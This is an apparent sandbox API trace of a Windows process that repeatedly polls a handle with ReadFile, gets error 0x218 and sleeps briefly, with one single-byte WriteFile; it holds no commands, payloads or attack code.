	[0241.068] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0241.068] GetLastError () returned 0x218
	[0241.068] Sleep (dwMilliseconds=0xa) 
	[0241.083] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0241.083] GetLastError () returned 0x218
	[0241.083] Sleep (dwMilliseconds=0xa) 
	[0241.100] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0241.101] GetLastError () returned 0x218
	[0241.101] Sleep (dwMilliseconds=0xa) 
	[0241.115] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0241.115] GetLastError () returned 0x218
	[0241.115] Sleep (dwMilliseconds=0xa) 
	[0241.161] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0241.161] GetLastError () returned 0x218
	[0241.161] Sleep (dwMilliseconds=0xa) 
	[0241.208] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0241.208] GetLastError () returned 0x218
	[0241.208] Sleep (dwMilliseconds=0xa) 
	[0241.286] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0241.286] GetLastError () returned 0x218
	[0241.286] Sleep (dwMilliseconds=0xa) 
	[0241.345] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0241.345] GetLastError () returned 0x218
	[0241.345] Sleep (dwMilliseconds=0xa) 
	[0241.375] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0241.375] GetLastError () returned 0x218
	[0241.376] Sleep (dwMilliseconds=0xa) 
	[0241.384] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0241.384] GetLastError () returned 0x218
	[0241.384] Sleep (dwMilliseconds=0xa) 
	[0241.395] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0241.395] GetLastError () returned 0x218
	[0241.395] Sleep (dwMilliseconds=0xa) 
	[0241.411] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0241.411] GetLastError () returned 0x218
	[0241.411] Sleep (dwMilliseconds=0xa) 
	[0241.435] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0241.435] GetLastError () returned 0x218
	[0241.435] Sleep (dwMilliseconds=0xa) 
	[0241.473] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0241.473] GetLastError () returned 0x218
	[0241.473] Sleep (dwMilliseconds=0xa) 
	[0241.520] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0241.520] GetLastError () returned 0x218
	[0241.520] Sleep (dwMilliseconds=0xa) 
	[0241.567] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0241.567] GetLastError () returned 0x218
	[0241.567] Sleep (dwMilliseconds=0xa) 
	[0241.582] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0241.582] GetLastError () returned 0x218
	[0241.582] Sleep (dwMilliseconds=0xa) 
	[0241.598] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0241.598] GetLastError () returned 0x218
	[0241.598] Sleep (dwMilliseconds=0xa) 
	[0241.613] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0241.614] GetLastError () returned 0x218
	[0241.614] Sleep (dwMilliseconds=0xa) 
	[0241.630] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0241.630] GetLastError () returned 0x218
	[0241.630] Sleep (dwMilliseconds=0xa) 
	[0241.645] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0241.645] GetLastError () returned 0x218
	[0241.645] Sleep (dwMilliseconds=0xa) 
	[0241.661] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0241.661] GetLastError () returned 0x218
	[0241.661] Sleep (dwMilliseconds=0xa) 
	[0241.676] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0241.676] GetLastError () returned 0x218
	[0241.676] Sleep (dwMilliseconds=0xa) 
	[0241.723] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0241.723] GetLastError () returned 0x218
	[0241.723] Sleep (dwMilliseconds=0xa) 
	[0241.769] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0241.769] GetLastError () returned 0x218
	[0241.770] Sleep (dwMilliseconds=0xa) 
	[0241.800] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0241.800] GetLastError () returned 0x218
	[0241.801] Sleep (dwMilliseconds=0xa) 
	[0241.816] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0241.816] GetLastError () returned 0x218
	[0241.816] Sleep (dwMilliseconds=0xa) 
	[0241.832] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0241.832] GetLastError () returned 0x218
	[0241.832] Sleep (dwMilliseconds=0xa) 
	[0241.848] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0241.848] GetLastError () returned 0x218
	[0241.848] Sleep (dwMilliseconds=0xa) 
	[0241.864] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0241.864] GetLastError () returned 0x218
	[0241.864] Sleep (dwMilliseconds=0x3e8) 
	[0242.879] WriteFile (in: hFile=0x258, lpBuffer=0x116f4dc, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x116f4d4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x116f4d4, lpOverlapped=0x0) returned 0
	[0242.879] Sleep (dwMilliseconds=0xa) 
	[0242.893] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0242.893] GetLastError () returned 0x218
	[0242.893] Sleep (dwMilliseconds=0xa) 
	[0242.909] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0242.909] GetLastError () returned 0x218
	[0242.909] Sleep (dwMilliseconds=0xa) 
	[0242.925] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0242.925] GetLastError () returned 0x218
	[0242.925] Sleep (dwMilliseconds=0xa) 
	[0242.941] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0242.941] GetLastError () returned 0x218
	[0242.941] Sleep (dwMilliseconds=0xa) 
	[0242.987] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0242.987] GetLastError () returned 0x218
	[0242.987] Sleep (dwMilliseconds=0xa) 
	[0243.034] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0243.034] GetLastError () returned 0x218
	[0243.034] Sleep (dwMilliseconds=0xa) 
	[0243.080] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0243.080] GetLastError () returned 0x218
	[0243.080] Sleep (dwMilliseconds=0xa) 
	[0243.103] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0243.103] GetLastError () returned 0x218
	[0243.103] Sleep (dwMilliseconds=0xa) 
	[0243.111] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0243.112] GetLastError () returned 0x218
	[0243.112] Sleep (dwMilliseconds=0xa) 
	[0243.128] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0243.128] GetLastError () returned 0x218
	[0243.128] Sleep (dwMilliseconds=0xa) 
	[0243.144] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0243.144] GetLastError () returned 0x218
	[0243.144] Sleep (dwMilliseconds=0xa) 
	[0243.160] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0243.160] GetLastError () returned 0x218
	[0243.161] Sleep (dwMilliseconds=0xa) 
	[0243.190] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0243.190] GetLastError () returned 0x218
	[0243.191] Sleep (dwMilliseconds=0xa) 
	[0243.237] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0243.237] GetLastError () returned 0x218
	[0243.237] Sleep (dwMilliseconds=0xa) 
	[0243.296] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0243.296] GetLastError () returned 0x218
	[0243.296] Sleep (dwMilliseconds=0xa) 
	[0243.331] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0243.331] GetLastError () returned 0x218
	[0243.331] Sleep (dwMilliseconds=0xa) 
	[0243.378] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0243.378] GetLastError () returned 0x218
	[0243.378] Sleep (dwMilliseconds=0xa) 
	[0243.397] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0243.397] GetLastError () returned 0x218
	[0243.397] Sleep (dwMilliseconds=0xa) 
	[0243.408] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0243.408] GetLastError () returned 0x218
	[0243.408] Sleep (dwMilliseconds=0xa) 
	[0243.424] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0243.424] GetLastError () returned 0x218
	[0243.424] Sleep (dwMilliseconds=0xa) 
	[0243.440] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0243.440] GetLastError () returned 0x218
	[0243.440] Sleep (dwMilliseconds=0xa) 
	[0243.456] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0243.456] GetLastError () returned 0x218
	[0243.456] Sleep (dwMilliseconds=0xa) 
	[0243.473] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0243.473] GetLastError () returned 0x218
	[0243.474] Sleep (dwMilliseconds=0xa) 
	[0243.487] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0243.487] GetLastError () returned 0x218
	[0243.488] Sleep (dwMilliseconds=0xa) 
	[0243.503] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0243.503] GetLastError () returned 0x218
	[0243.503] Sleep (dwMilliseconds=0xa) 
	[0243.548] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0243.548] GetLastError () returned 0x218
	[0243.548] Sleep (dwMilliseconds=0xa) 
	[0243.595] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0243.595] GetLastError () returned 0x218
	[0243.595] Sleep (dwMilliseconds=0xa) 
	[0243.637] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0243.637] GetLastError () returned 0x218
	[0243.637] Sleep (dwMilliseconds=0xa) 
	[0243.642] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0243.642] GetLastError () returned 0x218
	[0243.642] Sleep (dwMilliseconds=0xa) 
	[0243.658] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0243.658] GetLastError () returned 0x218
	[0243.658] Sleep (dwMilliseconds=0xa) 
	[0243.673] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0243.673] GetLastError () returned 0x218
	[0243.673] Sleep (dwMilliseconds=0xa) 
	[0243.691] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0243.691] GetLastError () returned 0x218
	[0243.691] Sleep (dwMilliseconds=0xa) 
	[0243.706] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0243.706] GetLastError () returned 0x218
	[0243.706] Sleep (dwMilliseconds=0xa) 
	[0243.720] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0243.720] GetLastError () returned 0x218
	[0243.720] Sleep (dwMilliseconds=0xa) 
	[0243.737] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0243.738] GetLastError () returned 0x218
	[0243.738] Sleep (dwMilliseconds=0xa) 
	[0243.773] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0243.773] GetLastError () returned 0x218
	[0243.773] Sleep (dwMilliseconds=0xa) 
	[0243.813] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0243.813] GetLastError () returned 0x218
	[0243.813] Sleep (dwMilliseconds=0xa) 
	[0243.860] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0243.860] GetLastError () returned 0x218
	[0243.860] Sleep (dwMilliseconds=0xa) 
	[0243.919] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0243.920] GetLastError () returned 0x218
	[0243.920] Sleep (dwMilliseconds=0xa) 
	[0243.923] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0243.923] GetLastError () returned 0x218
	[0243.923] Sleep (dwMilliseconds=0xa) 
	[0243.940] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0243.940] GetLastError () returned 0x218
	[0243.940] Sleep (dwMilliseconds=0xa) 
	[0243.955] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0243.955] GetLastError () returned 0x218
	[0243.955] Sleep (dwMilliseconds=0xa) 
	[0243.970] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0243.971] GetLastError () returned 0x218
	[0243.971] Sleep (dwMilliseconds=0xa) 
	[0243.986] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0243.986] GetLastError () returned 0x218
	[0243.986] Sleep (dwMilliseconds=0xa) 
	[0244.032] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0244.032] GetLastError () returned 0x218
	[0244.032] Sleep (dwMilliseconds=0xa) 
